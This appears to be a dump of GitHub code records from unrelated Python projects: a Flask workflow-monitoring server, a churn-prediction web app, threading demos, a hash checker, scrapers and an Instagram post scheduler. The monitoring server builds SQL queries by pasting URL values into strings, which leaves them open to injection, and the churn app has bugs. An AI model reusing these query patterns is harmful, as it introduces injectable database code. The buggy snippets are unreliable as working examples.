Task.query.filter_by(run_id=workflow_id)\n    return render_template('app.html',\n                           app_name=\"All Apps\",\n                           workflow_details=workflow_details,\n                           task_summary=task_summary)\n\n\n@app.route('/workflow/<workflow_id>/app/<app_name>')\ndef parsl_app(workflow_id, app_name):\n    workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n\n    if workflow_details is None:\n        return render_template('error.html', message=\"Workflow %s could not be found\" % workflow_id)\n\n    task_summary = Task.query.filter_by(\n        run_id=workflow_id, task_func_name=app_name)\n    return render_template('app.html',\n                           app_name=app_name,\n                           workflow_details=workflow_details,\n                           task_summary=task_summary)\n\n\n@app.route('/workflow/<workflow_id>/task/<task_id>')\ndef task(workflow_id, task_id):\n    workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n\n    if workflow_details is None:\n        return render_template('error.html', message=\"Workflow %s could not be found\" % workflow_id)\n\n    task_details = Task.query.filter_by(\n        run_id=workflow_id, task_id=task_id).first()\n    task_status = Status.query.filter_by(\n        run_id=workflow_id, task_id=task_id).order_by(Status.timestamp)\n\n    df_resources = pd.read_sql_query(\n        \"SELECT * FROM resource WHERE run_id='%s' AND task_id='%s'\" % (workflow_id, task_id), db.engine)\n\n    return render_template('task.html',\n                           workflow_details=workflow_details,\n                           task_details=task_details,\n                           task_status=task_status,\n                           # time_series_cpu_time=time_series_cpu_per_task_plot(df_resources, 'psutil_process_time_user', 'CPU user time'),\n                           time_series_cpu_percent=time_series_cpu_per_task_plot(\n                               df_resources, 'psutil_process_cpu_percent', 'CPU Utilization'),\n                           time_series_memory_resident=time_series_memory_per_task_plot(\n                               df_resources, 'psutil_process_memory_resident', 'Memory Usage'),\n                           # time_series_memory_percent=time_series_memory_per_task_plot(df_resources, 'psutil_process_memory_percent', 'Memory utilization')\n                           )\n\n\n@app.route('/workflow/<workflow_id>/dag_<path>')\n@app.route('/workflow/<workflow_id>/dag_')\ndef workflow_dag_details(workflow_id, path='group_by_apps'):\n    workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n    df_tasks = pd.read_sql_query(\"\"\"SELECT task_id, task_func_name, task_depends,\n                                 task_time_submitted, task_time_returned, task_time_running\n                                 FROM task WHERE run_id='%s' \"\"\"\n                                 % (workflow_id), db.engine)\n\n    group_by_apps = (path == \"group_by_apps\")\n    return render_template('dag.html',\n                           workflow_details=workflow_details,\n                           group_by_apps=group_by_apps,\n                           workflow_dag_plot=workflow_dag_plot(df_tasks, group_by_apps=group_by_apps))\n\n\n@app.route('/workflow/<workflow_id>/resource_usage')\ndef workflow_resources(workflow_id):\n    workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n    if workflow_details is None:\n        return render_template('error.html', message=\"Workflow %s could not be found\" % workflow_id)\n\n    df_resources = pd.read_sql_query(\n        \"SELECT * FROM resource WHERE run_id='%s'\" % (workflow_id), db.engine)\n    df_task = pd.read_sql_query(\n        \"SELECT * FROM task WHERE run_id='%s'\" % (workflow_id), db.engine)\n\n    df_task_resources = pd.read_sql_query('''\n          SELECT task_id, timestamp, resource_monitoring_interval,\n                 psutil_process_cpu_percent, psutil_process_time_user,\n                 psutil_process_memory_percent, psutil_process_memory_resident\n          from resource\n          where run_id = '%s'\n          ''' % (workflow_id), db.engine)\n\n    return render_template('resource_usage.html', workflow_details=workflow_details,\n                           user_time_distribution_avg_plot=resource_distribution_plot(\n                               df_resources, df_task, type='psutil_process_time_user', 
label='CPU Time Distribution', option='avg'),\n user_time_distribution_max_plot=resource_distribution_plot(\n df_resources, df_task, type='psutil_process_time_user', label='CPU Time Distribution', option='max'),\n memory_usage_distribution_avg_plot=resource_distribution_plot(\n df_resources, df_task, type='psutil_process_memory_resident', label='Memory Distribution', option='avg'),\n memory_usage_distribution_max_plot=resource_distribution_plot(\n df_resources, df_task, type='psutil_process_memory_resident', label='Memory Distribution', option='max'),\n user_time_time_series=resource_time_series(\n df_task_resources, type='psutil_process_time_user', label='CPU User Time'),\n cpu_percent_time_series=resource_time_series(\n df_task_resources, type='psutil_process_cpu_percent', label='CPU Utilization'),\n memory_percent_time_series=resource_time_series(\n df_task_resources, type='psutil_process_memory_percent', label='Memory Utilization'),\n memory_resident_time_series=resource_time_series(\n df_task_resources, type='psutil_process_memory_resident', label='Memory Usage'),\n )\n","repo_name":"Parsl/viz_server","sub_path":"viz_server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"755969977","text":"import datetime as dt\n\nfrom sqlalchemy import Date, Integer, String\nfrom sqlalchemy.orm import Mapped, column_property, mapped_column\n\nfrom bot.database.base import AlchemyBaseModel\n\n\nclass ClassLessons(AlchemyBaseModel):\n \"\"\"Модель для хранения расписания уроков для конкретного класса.\"\"\"\n\n __tablename__ = \"class_lessons\"\n\n id: Mapped[int] = mapped_column(\n Integer,\n primary_key=True,\n autoincrement=True,\n unique=True,\n nullable=False,\n )\n\n date: Mapped[dt.date] = mapped_column(Date, nullable=False)\n grade: Mapped[str] = mapped_column(String(2), nullable=False) # 10 или 11\n letter: Mapped[str] = mapped_column(String(1), nullable=False) # А, Б, В\n class_: Mapped[str] = column_property(grade + letter)\n file_id: Mapped[str] = mapped_column(String(128), nullable=False)\n","repo_name":"K1rL3s/Telegram-UPML-Bot","sub_path":"bot/database/models/class_lessons.py","file_name":"class_lessons.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38174238499","text":"from flask import Flask, render_template, request\nimport pickle\nimport pandas as pd\nimport numpy as np\n\n\napp = Flask(__name__)\n\nmodel = pickle.load(open('randomforest_classifier.pkl', 'rb'))\n\nstandard_scaler = pickle.load(open('sc.pkl', 'rb'))\n\n\ndef prepare_data(genero, aposentado, casado, dependente, tenure, servico_telefone, multlinhas, servico_internet, seguro_online, backup_online, protecao_celular, suporte_tecnico, streamtv, streammovies, contract, paperless, payment, monthly, total):\n\n colunas = ['Male', 'SeniorCitizen', 'Partner', 'Dependents',\n 'tenure', 'PhoneService', 'MultipleLines', 'InternetService',\n 'OnlineSecurity', 'OnlineBackup', 'DeviceProtection', 'TechSupport',\n 'StreamingTV', 'StreamingMovies', 'Contract', 'PaperlessBilling',\n 'PaymentMethod', 'MonthlyCharges', 'TotalCharges']\n \n is_male = 1 if genero == 'homem' else 0\n is_senior = 1 if aposentado =='sim' else 0 \n is_partner = 1 if casado == 'sim' else 0\n is_dependent = 1 if dependente == 'sim' else 0\n \n is_phoneservice = 1 if servico_telefone == 'sim' else 0\n is_multiplelines = 1 if 
multlinhas == 'sim' else 0\n \n if servico_internet == 'fibra óptica':\n internetservice = 1\n elif servico_internet == 'dsl':\n internetservice = 2\n elif servico_internet == 'Não':\n internetservice = 0\n \n is_onlinesecurity = 1 if seguro_online == 'sim' else 0\n is_onlinebackup = 1 if backup_online == 'sim' else 0\n is_deviceprotection = 1 if protecao_celular == 'sim' else 0\n is_techsupport = 1 if suporte_tecnico == 'sim' else 0\n is_streamingtv = 1 if streamtv == 'sim' else 0\n is_streamingmovies = 1 if streammovies == 'sim' else 0\n \n if contract == 'dois anos':\n contrato = 12\n elif contract == 'um ano':\n contrato = 12\n elif contract == 'mês':\n contrato = 1\n\n is_paperlessbilling = 1 if paperless == 'sim' else 0\n \n \n if payment == 'cheque eletrônico':\n payment_method = 1\n elif payment == 'cheque por correio':\n payment_method = 2\n elif payment == 'transferência bancária':\n payment_method = 3\n elif payment == 'cartão de crédito automático':\n payment_method = 4\n \n\n dados_entrada = [[is_male],\n [is_senior],\n [is_partner],\n [is_dependent],\n [tenure],\n [is_phoneservice],\n [is_multiplelines], \n [internetservice],\n [is_onlinesecurity],\n [is_onlinebackup],\n [is_deviceprotection],\n [is_techsupport], \n [is_streamingtv], \n [is_streamingmovies],\n [contrato],\n [is_paperlessbilling],\n [payment_method], \n [monthly], \n [total]]\n \n dados_entrada = dict(zip(colunas, dados_entrada))\n X = pd.DataFrame(dados_entrada)\n escalados = standard_scaler.transform(X)\n final = pd.DataFrame(escalados, columns = colunas)\n return final\n \n@app.route('/')\ndef home():\n return render_template('deploy.html')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n\n features = list(request.form.values())\n genero, aposentado, casado, dependente, tenure, servico_telefone, multlinhas, servico_internet, seguro_online, backup_online, protecao_celular, suporte_tecnico, streamtv, streammovies, contract, paperless, payment, monthly, total = features[0], int(features[1]), int(features[2]), int(features[3]), int(features[4]), int(features[5]), int(features[6]), int(features[7]), int(features[8]), int(features[9]), int(features[10]), int(features[11]), int(features[12]), int(features[13]), int(features[14]), int(features[15]), int(features[16]), int(features[17]), int(features[18])\n final = prepare_data(genero.lower(), aposentado.lower(), casado.lower(), dependente.lower(), tenure, servico_telefone.lower(), multlinhas.lower(), servico_internet.lower(), seguro_online.lower(), backup_online.lower(), protecao_celular.lower(), suporte_tecnico.lower(), streamtv.lower(), streammovies.lower(), contract.lower(), paperless.lower(), payment.lower(), monthly, total)\n pred = rfc.predict(final)\n churn = pred[0]\n return render_template('deploy.html', prediction_text = churn)\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"adrianomnn/deploy_projeto_final_awari","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39824397479","text":"\"\"\"\nnewer way and faster way of creating threads.\n\nIn python 3.2 the feature added called \"Thread pool executor\" and in lot of cases this is the easier and more efficient to run these threads.\nAnd it also allows to easily switch over to multiple processes instead of threads as well depending on the problem we trying to solve.\n\n\"\"\"\nimport re\nimport time\nimport concurrent.futures\n\n\ndef 
do_something(sleep_seconds=1, thread_name=None) -> str:\n thread_name = thread_name if thread_name else f\"Thread-{str(sleep_seconds)}\"\n print(\n f'Sleeping the thread {thread_name}, for {sleep_seconds} second(s) ...')\n time.sleep(sleep_seconds)\n return f'{thread_name } Sleeping done ....'\n\n\ndef multi_thread_using_context():\n with concurrent.futures.ThreadPoolExecutor() as executor:\n start = time.perf_counter()\n\n t1 = executor.submit(do_something, 1, \"thread-1\")\n t2 = executor.submit(do_something, 1, \"thread-2\")\n\n print(t1.result())\n print(t2.result())\n\n finish = time.perf_counter()\n # Actual time\n actual_time = round(finish-start, 2)\n print(f'finished in {actual_time} second(s)')\n\n\ndef multi_thread_get_result_using_loop():\n with concurrent.futures.ThreadPoolExecutor() as executor:\n\n start = time.perf_counter()\n\n sleep_seconds = [5, 4, 3, 2, 1]\n\n \"\"\"\n Using general Loop:\n\n futures = []\n for i in sleep_seconds:\n futures.append(executor.submit(do_something, i, f'Thread-{i}'))\n \n for f in concurrent.futures.as_completed(futures):\n print(f.result())\n \"\"\"\n\n # The same general for loop can be written using LIST comprehension.\n futures = [executor.submit(\n do_something, sec, f'Thread-{sec}') for sec in sleep_seconds]\n\n \"\"\"\n An iterator over the given futures that yields each as it completes.\n # Using plain for loop:\n for f in futures:\n print(f.result())\n Returns:\n --------\n An iterator that yields the given Futures as they complete (finished or\n cancelled). If any given Futures are duplicated, they will be returned\n once.\n \"\"\"\n for f in concurrent.futures.as_completed(futures):\n print(f.result())\n\n finish = time.perf_counter()\n # Actual time\n actual_time = round(finish-start, 2)\n print(f'finished in {actual_time} second(s)')\n\n\ndef multi_thread_get_result_using_map():\n with concurrent.futures.ThreadPoolExecutor() as executor:\n start = time.perf_counter()\n sleep_seconds = [5, 4, 3, 2, 1]\n \"\"\"\n An iterator equivalent to: python map(func, *iterables) but the calls may be evaluated out-of-order\n\n map Directly returns the results, instead of futures like we see in threads using loop.\n \"\"\"\n results = executor.map(do_something, sleep_seconds)\n\n for result in results:\n print(result)\n\n finish = time.perf_counter()\n # Actual time\n actual_time = round(finish-start, 2)\n print(f'finished in {actual_time} second(s)')\n\n\nif __name__ == \"__main__\":\n \"\"\"\n O/P:\n ---\n\n Sleeping the thread thread-1, for 1 second(s) ...\n Sleeping the thread thread-2, for 1 second(s) ...\n thread-1 Sleeping done ....\n thread-2 Sleeping done ....\n finished in 1.01 second(s)\n \"\"\"\n # multi_thread_using_context()\n\n \"\"\"\n Yields the results as they complete (finished or cancelled)\n\n O/P:\n -----\n\n Sleeping the thread Thread-5, for 5 second(s) ...\n Sleeping the thread Thread-4, for 4 second(s) ...\n Sleeping the thread Thread-3, for 3 second(s) ...\n Sleeping the thread Thread-2, for 2 second(s) ...\n Sleeping the thread Thread-1, for 1 second(s) ...\n Thread-1 Sleeping done ....\n Thread-2 Sleeping done ....\n Thread-3 Sleeping done ....\n Thread-4 Sleeping done ....\n Thread-5 Sleeping done ....\n finished in 5.01 second(s)\n \"\"\"\n # multi_thread_get_result_using_loop()\n\n \"\"\"\n Yields the results as they created.\n \n O/P:\n ---\n\n Sleeping the thread Thread-5, for 5 second(s) ...\n Sleeping the thread Thread-4, for 4 second(s) ...\n Sleeping the thread Thread-3, for 3 second(s) ...\n Sleeping the 
thread Thread-2, for 2 second(s) ...\n Sleeping the thread Thread-1, for 1 second(s) ...\n Thread-5 Sleeping done ....\n Thread-4 Sleeping done ....\n Thread-3 Sleeping done ....\n Thread-2 Sleeping done ....\n Thread-1 Sleeping done ....\n finished in 5.01 second(s)\n \"\"\"\n multi_thread_get_result_using_map()\n","repo_name":"Avinashgurugubelli/python_basics","sub_path":"src/multi_threading/mt_example_2.py","file_name":"mt_example_2.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27738152232","text":"from itertools import permutations\nfrom collections import deque\n\n\ndef solution(expression: str):\n answer: int = 0\n priors: list = list(permutations(['*', '+', '-']))\n\n\n mx: int = 0\n for prior in priors:\n print(prior)\n mx = max(mx, cal(expression, prior))\n print(mx, '\\n')\n\n return mx \n\n\ndef cal(expression: str, prior: tuple):\n for op in prior[:-1]:\n i: int = 0\n stack: deque = deque() \n while i < len(expression):\n if op == expression[i]:\n pre: str = \"\"\n\n while stack and stack[-1] not in prior: \n pre += stack.pop() \n if len(stack) == 1 and stack[0] in prior:\n pre += stack.pop() \n pre = pre[::-1]\n\n j: int = i + 1\n if expression[j] in prior:\n j += 1\n while j < len(expression) and expression[j] not in prior:\n j += 1\n pre += expression[i:j] \n\n for a in str(eval(pre)):\n stack.append(a)\n i = j \n\n else:\n stack.append(expression[i])\n i += 1\n \n expression = ''.join(stack)\n # print(expression)\n return abs(eval(expression))\n\n\nif __name__ == '__main__':\n print(solution(\"100-200*300-500+20\"), '\\n')\n print(solution(\"100-200*300+500-20\"), '\\n')\n print(solution(\"50*6-3*2\"), '\\n')\n print(solution(\"50*6+3*2\"), '\\n')","repo_name":"thisisiron/Algorithm","sub_path":"Programmers/kakao_intern/2020/modification.py","file_name":"modification.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6658868309","text":"from tkinter import *\nimport hashlib\n# MD5 local test strings\n# M:/Downloads/Universal-USB-Installer-1.9.7.0.exe\n# 6EF9B8E4AAF56E0D48EA8E22ECC90A9D\n\nwindow = Tk()\nwindow.title('Hash Check App')\nwindow.resizable(0,0)\n\ndef dialog():\n path1 = fp.get()\n parent = hsh.get()\n htype = hashtype.get()\n\n try:\n if htype == 'MD5':\n hasher = hashlib.md5()\n elif htype == 'SHA1':\n hasher = hashlib.sha1()\n elif htype == 'SHA256':\n hasher = hashlib.sha256()\n elif htype == 'SHA512':\n hasher = hashlib.sha512()\n# MAIN HASH FUNCTION ===============================\n BLOCKSIZE = 65536\n with open(path1, 'rb') as afile:\n buf = afile.read(BLOCKSIZE)\n while len(buf) > 0:\n hasher.update(buf)\n buf = afile.read(BLOCKSIZE)\n filehash = hasher.hexdigest()\n# END HASH FUNCTION ===============================\n if not parent:\n box.showinfo(htype+' Hash Generated',filehash)\n hsh.set(filehash)\n else:\n if filehash == parent or filehash.upper() == parent:\n print(\"match\")\n box.showinfo('Success','The file has is a match!')\n else:\n print(\"no match\")\n print(hasher.hexdigest())\n box.showwarning('Failure','The file and the supplied hash do not match.')\n except FileNotFoundError:\n box.showerror('Error','File path was either left blank or the specified file does not exist.')\n\nfp = StringVar()\nfilepath = Entry(window, textvariable=fp, width=100)\nfplbl = Label(window, text=\"File Path:\")\nhsh = StringVar()\nhashword = 
Entry(window,textvariable=hsh,width=100)\nhlbl = Label(window, text=\"Hash:\")\nbtn = Button(window,text = 'Run', command = dialog, width=10)\nhashtype = StringVar()\n# img = PhotoImage(file = \"M:/Python/Capture.gif\")\n# imgLbl = Label(window, image = img)\n\n# Geometry ====================================\nfplbl.grid(row = 1, column = 1, padx = (10,5),pady=(10,5),sticky=W)\nfilepath.grid(row=1,column=2,padx=(0,10),pady=(10,5),columnspan=6)\nhlbl.grid(row = 2, column = 1, padx = (10,5),pady = (5,10),sticky=W)\nhashword.grid(row=2, column=2,padx=(0,10),pady = (5,10),columnspan=6)\nbtn.grid(row =3,column =3,rowspan=4,sticky=W,padx=(0,10))\n# imgLbl.grid(row =3, column =4,columnspan=4,rowspan=4)\n\n# GENERATE RADIO BUTTONS\nhashoptions = ['MD5','SHA1','SHA256','SHA512']\ni = 0\nfor txt in hashoptions:\n i += 1\n b = Radiobutton(window, text=txt, padx=10, variable=hashtype, value=txt)\n b.grid(row =i+2, column = 2,sticky=W)\n if i == 1:\n b.select()\n if i == 4:\n b.grid(pady = (0,5))\n\nwindow.mainloop()\n","repo_name":"nivagator/hash-check-app","sub_path":"hashcheck_v02.py","file_name":"hashcheck_v02.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23345156205","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n__title__ = ''\n__author__ = 'javen'\n__mtime__ = '17-3-30'\n# code is far away from bugs with the god animal protecting\n I love animals. They taste delicious.\n ┏┓ ┏┓\n ┏┛┻━━━┛┻┓\n ┃ ☃ ┃\n ┃ ┳┛ ┗┳ ┃\n ┃ ┻ ┃\n ┗━┓ ┏━┛\n ┃ ┗━━━┓\n ┃ 神兽保佑 ┣┓\n ┃ 永无BUG! ┏┛\n ┗┓┓┏━┳┓┏┛\n ┃┫┫ ┃┫┫\n ┗┻┛ ┗┻┛\n\"\"\"\nimport pytz\n\nimport datetime\nfrom Models.Mapper.Abstract import Model_Mapper_Abstract\nclass Model_Mapper_AmazonProduct(Model_Mapper_Abstract):\n def __init__(self):\n super(Model_Mapper_AmazonProduct, self).__init__()\n\n def save(self, region, asin, data):\n searchData = {'region': region,\n 'asin' : asin,\n }\n result = self.findData(\"all\", \"amazon_product\", searchData)\n if (result):\n # print (result)\n result = self.update(\"amazon_product\", data, searchData)\n else:\n tz = pytz.timezone('Asia/Shanghai')\n last_updated_time = datetime.datetime.now(tz).strftime(\"%Y-%m-%d %H:%M:%S\")\n data['last_updated_time'] = last_updated_time\n result = self.insert(\"amazon_product\", data, searchData)\n return result\n\n def saveFromKeywordsProduct(self, region, data):\n searchData = {\n 'region': region,\n 'asin': data['asin']\n }\n result = self.findData(\"all\", \"amazon_product\", searchData)\n if (result):\n result = self.update(\"amazon_product\", data, searchData)\n else:\n result = self.insert(\"amazon_product\", data, searchData)\n return result\n","repo_name":"GinVenXi/All_Scraper","sub_path":"all_scraper/Models/Mapper/AmazonProduct.py","file_name":"AmazonProduct.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"8773332121","text":"import datetime\nimport os\nimport re\nimport PyPDF2\nimport vaxutils\n\n\ndef main():\n\n date = datetime.date.today() - datetime.timedelta(days=1)\n url_date = date.strftime(\"%-d.%-m.%y\")\n url = f\"http://www.covidmaroc.ma/Documents/BULLETIN/{url_date}.COVID-19.pdf\"\n \n os.system(f\"curl {url} -o morocco.pdf -s\")\n\n with open(\"morocco.pdf\", \"rb\") as pdfFileObj:\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n text = pdfReader.getPage(0).extractText()\n\n regex = r\"Bénéficiaires de la vaccination\\s+Cumul 
global([\\d\\s]+)Situation épidémiologique\"\n\n total_vaccinations = re.search(regex, text)\n total_vaccinations = vaxutils.clean_count(total_vaccinations.group(1))\n\n date = str(date)\n\n vaxutils.increment(\n location=\"Morocco\",\n total_vaccinations=total_vaccinations,\n date=date,\n source_url=url,\n vaccine=\"Oxford/AstraZeneca, Sinopharm/Beijing\"\n )\n\n os.remove(\"morocco.pdf\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"arafatahmedtanimcsedu57/covid-data","sub_path":"scripts/scripts/vaccinations/automations/incremental/morocco.py","file_name":"morocco.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11984872008","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport functools as ft\nfrom math import *\n\n\ndef arrayFfile(nome):\n with open(nome) as file:\n data = file.read()\n vetor = data.split()\n for i in range(len(vetor)):\n vetor[i] = int(vetor[i])\n return vetor\n\ndef plotHist(vetor):\n plt.hist(vetor, rwidth=0.5)\n\n\ndef media(vetor):\n return sum(vetor)/len(vetor)\n\ndef mediaPond(matriz):\n pesoTotal = sum(matriz[1])\n valorTotal = 0\n for i in range(len(matriz[1])):\n valorTotal += matriz[0][i]*matriz[1][i]\n return valorTotal/pesoTotal\n\ndef mediaGeometrica(vetor):\n acumulador = 1\n for i in range(len(vetor)):\n acumulador*=vetor[i]\n return acumulador**(1/len(vetor))\n \ndef amplitude(vetor):\n min = min(vetor)\n max = max(vetor)\n return max-min\n\ndef mediaTaxas(vetorA, vetorB):\n media(vetorA/vetorB)\n\ndef mediana(vetor):\n vetor_ordenado = sorted(vetor)\n tamanho = len(vetor_ordenado)\n\n if tamanho % 2 == 0:\n mediana = (vetor_ordenado[tamanho // 2-1] + vetor_ordenado[tamanho //2])/2\n else:\n mediana = vetor_ordenado[tamanho // 2]\n return mediana\n \n#----------------------To do---------------------------------\n\n\n#def mediaHarmonica\n#def mediaTaxas\n#--exercicio slide 18Exercício\n#def mediana\n#def moda\n#--exercicio slide 29\n#--exercicio slide 30\n#--exercicio slide 31\n#def desvioPadrao\n#--exercicio slide 33\n#def coefVariacao\n##--exercicio slide 35\n#def quartis\n##--exercicio slide 42\n#def intevaloConfiancaMedia\n#--exercicio slide 51\n#--exercicio slide 54\n#def testeMediazero\n#--exercicio slide 58\n#--exercicio slide 59\n#--exercicio slide 62\n#def tamanhoAmostra\n#--exercicio slide 67\n#--exercicio slide 69\n#def testeHipotese\n#def testeShapWilk\n#--exercicio slide 86\n#\n#\n#\n\n","repo_name":"EugenioAL/Avd","sub_path":"avdLib.py","file_name":"avdLib.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"29956619369","text":"import xlsxwriter\nimport csv\nimport datetime\nimport pandas as pd\nimport os\nimport time\nimport random\nfrom PIL import Image\n\n#generowanie zdania\npoczatek = [\"Sexy\", \"Treffen\", \"Treffen Sie das Schöne\", \"Schön\", \"Hot\", \"Erotisch\", \"Hübsch\", \"Attraktiv\",\"Frech\",\"Süß\",\"Einmalig\"]\n\nimiona = ['Mia', 'Emma', 'Hannah', 'Emilia', 'Lina', 'Sophia', 'Anna', 'Marie', 'Milena', 'Lena', 'Lara', 'Lea', 'Maja', 'Clara', 'Amelie', 'Johanna', 'Mila', 'Ida', 'Laura', 'Leni', 'Frieda', 'Luisa', 'Mathilda', 'Paula', 'Nele', 'Helena', 'Charlotte', 'Nora', 'Greta', 'Marlene', 'Jule', 'Melina', 'Jana', 'Sofie', 'Jasmin', 'Lotta', 'Fiona', 'Lisa', 'Paulina', 'Leonie', 'Carlotta', 'Annika', 'Victoria', 'Isabella', 'Franziska', 'Karoline', 'Annelie', 
'Celina', 'Ronja', 'Lynn', 'Katharina', 'Alina', 'Nina', 'Teresa', 'Kira', 'Chiara', 'Stella', 'Ella', 'Lia', 'Julie', 'Rosa', 'Leila', 'Elisa', 'Lucie', 'Linda', 'Jette', 'Mira', 'Gloria', 'Juliana', 'Ina', 'Jara', 'Magdalena', 'Amalia', 'Svea', 'Emily', 'Elina', 'Hedi', 'Henriette', 'Josephine', 'Anni', 'Elena', 'Liv', 'Felicitas', 'Emmi', 'Elisabeth', 'Tilda', 'Tara', 'Eva', 'Kaja', 'Juna', 'Annemarie', 'Maira', 'Merle', 'Nike', 'Milla', 'Ines', 'Josefine', 'Marlene', 'Angelina', 'Romy', 'Jolina', 'Klara']\n\n\nnaileoceniasz = \",Wie hoch schätzen Sie ein?\"\n\nemotki = [\"😍\",\"🤭\",\"👍\",\"😮\",\"😘\",\"🥰\",\"🤪\",\"😜\"]\n\nhashtags = ['#deutschland', '#girl', '#germany', '#münchen', '#kinderdirndl', '#германия', '#me', '#russian', '#taufkleid', '#德国', '#travel', '#лето', '#photography', '#summervibes', '#nomakeup', '#lithuanian', '#hamburg', '#taufdirndl', '#fest', '#女孩', '#annakaval', '#девочка', '#ukrainian', '#summer', '#alemania', '#nofilters', '#afrika', '#liebe', '#alpen']\n\n\n#rename pliki i convert na jpg\npath = \"S:\\\\insta\\\\niemiecki\"\n\n# get list of files in folder\nfiles = os.listdir(path)\n\n# keep only files with extension .webp or .png\nfiles = [f for f in files if f.endswith('.webp') or f.endswith('.png')]\n\n# loop through files and convert to jpg\nfor i, file in enumerate(files):\n # open file\n im = Image.open(os.path.join(path, file))\n \n # convert to jpg and save with new name\n new_name = f'{i+1}.jpg'\n im = im.convert('RGB')\n im.save(os.path.join(path, new_name))\n \n # delete original file\n os.remove(os.path.join(path, file))\n\n# rename remaining files to numbering from 1\nfiles = os.listdir(path)\nfor i, file in enumerate(files):\n # ignore files that are already jpg\n if not file.endswith('.jpg'):\n # construct new name\n new_name = f'{i+1}.jpg'\n \n # rename file\n os.rename(os.path.join(path, file), os.path.join(path, new_name))\n\n\n\n\n# Set up the input and output file paths\nxlsx_file_path = \"C:\\\\PROGRAMOWANIE\\\\PYTHON\\\\GotoweVistaBulk\\\\InstaEroDE.xlsx\"\n\ndate_str = input(\"Podaj date opublikowania pierwszego posta 'DD.MM.YYYY HH:MM': \")\n\ndate = datetime.datetime.strptime(date_str, \"%d.%m.%Y %H:%M\")\n\n# Create a new XLSX file and add a worksheet\nworkbook = xlsxwriter.Workbook(xlsx_file_path)\nworksheet = workbook.add_worksheet()\n\n \n \n\n# Set the column headers\nheader_row = [\"message\", \"type\", \"link\", \"time\",\"commment1\"]\nworksheet.write_row(0, 0, header_row)\n\n# Set up the CSV reader and read the column data\n\n\n# Write the column data and other data to the worksheet\nfor i in range(14):\n # Write the message column data\n \n sentence = f\"{random.choice(poczatek)} {random.choice(imiona)} {naileoceniasz} {random.choice(emotki)} \\n{random.choices(hashtags, k=15)}\"\n \n worksheet.write(i + 1, 0, sentence)\n \n # Write the type column data\n worksheet.write(i + 1, 1, \"image\")\n \n # Write the link column data\n link = f\"http://hosting2275851.online.pro/zdjecia/ero/instaDE/{i+1}.jpg\"\n worksheet.write(i + 1, 2, link)\n \n # Write the time column data\n \n \n worksheet.write(i + 1, 3, date.strftime(\"%d.%m.%Y %H:%M\"))\n date += datetime.timedelta(hours = 24)\n \n \n \n\n\n\n# Close the workbook\nworkbook.close()\n\n\n\n\n\n\n\n\n# read the xlsx file\ndf = pd.read_excel(\"C:\\\\PROGRAMOWANIE\\\\PYTHON\\\\GotoweVistaBulk\\\\InstaEroDE.xlsx\")\n\n# save as csv file\ndf.to_csv(\"C:\\\\PROGRAMOWANIE\\\\PYTHON\\\\GotoweVistaBulk\\\\InstaEroDE.csv\", index=False)\n\n# end the 
program\nexit()","repo_name":"Rajo03/Portfolio","sub_path":"PYTHON/AUTOMATYZACJA/generatorvistabulk/DO_ERO.PY","file_name":"DO_ERO.PY","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74091117684","text":"#!/usr/bin/env python3\n\n# NOTE: These are octal color codes are compatible with bash!\n# https://stackoverflow.com/a/28938235\nPREFIX = \"\\033\" # octal color code prefix\nRESET = \"\\033[0m\" # RESET all color codes with this\n\n# NOTE: Foreground\nBLACK = \"\\033[0;30m\" # BLACK\nRED = \"\\033[0;31m\" # RED\nGREEN = \"\\033[0;32m\" # GREEN\nYELLOW = \"\\033[0;33m\" # YELLOW\nBLUE = \"\\033[0;34m\" # BLUE\nMAGENTA = \"\\033[0;35m\" # PURPLE\nCYAN = \"\\033[0;36m\" # CYAN\nWHITE = \"\\033[0;37m\" # WHITE\n\n# NOTE: BOLD\nBLACK_BOLD = \"\\033[1;30m\" # BLACK\nRED_BOLD = \"\\033[1;31m\" # RED\nGREEN_BOLD = \"\\033[1;32m\" # GREEN\nYELLOW_BOLD = \"\\033[1;33m\" # YELLOW\nBLUE_BOLD = \"\\033[1;34m\" # BLUE\nMAGENTA_BOLD = \"\\033[1;35m\" # PURPLE\nCYAN_BOLD = \"\\033[1;3m\" # CYAN\nWHITE_BOLD = \"\\033[1;37m\" # WHITE\n\n# NOTE: UNDERLINE\nBLACK_U = \"\\033[4;30m\" # BLACK\nRED_U = \"\\033[4;31m\" # RED\nGREEN_U = \"\\033[4;32m\" # GREEN\nYELLOW_U = \"\\033[4;33m\" # YELLOW\nBLUE_U = \"\\033[4;34m\" # BLUE\nMAGENTA_U = \"\\033[4;35m\" # 